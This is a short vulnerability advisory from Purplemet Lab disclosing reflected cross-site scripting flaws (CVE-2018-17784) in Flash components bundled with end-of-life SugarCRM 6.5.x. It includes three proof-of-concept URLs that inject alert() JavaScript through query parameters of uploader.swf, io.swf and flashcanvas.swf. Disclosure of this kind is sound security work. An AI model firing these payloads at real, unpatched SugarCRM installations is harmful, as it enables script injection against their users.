SugarCRM Multiple Cross-Site Scripting Vulnerabilities

Vulnerability

Purplemet Lab team discovered multiple cross-site scripting (XSS) vulnerabilities in SugarCRM 6.5.x (CVE-2018-17784). These versions embed the following third party components: FlashCanvas which provides flashcanvas.swf and YUI which provides uploader.swf and io.swf. These Flash files are vulnerable to a cross-site scripting.

Solution

SugarCRM Community Edition 6.5 reached its end-of-life and is no longer supported. SurgarCRM 6.5.26 is the last version and no patches will be provided by the vendor.

Proof of concept

The vulnerabilities can be triggered using the following URL:

                            
                                http://ip/sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//
                            
                        

                            
                                http://ip/sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');}//
                            
                        

                            
                                http://ip/sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)}//
                            
                        

Purplemet technology detection

Purplemet detects SurgarCRM with version, YUI and flags FlashCanvas as Unsafe component.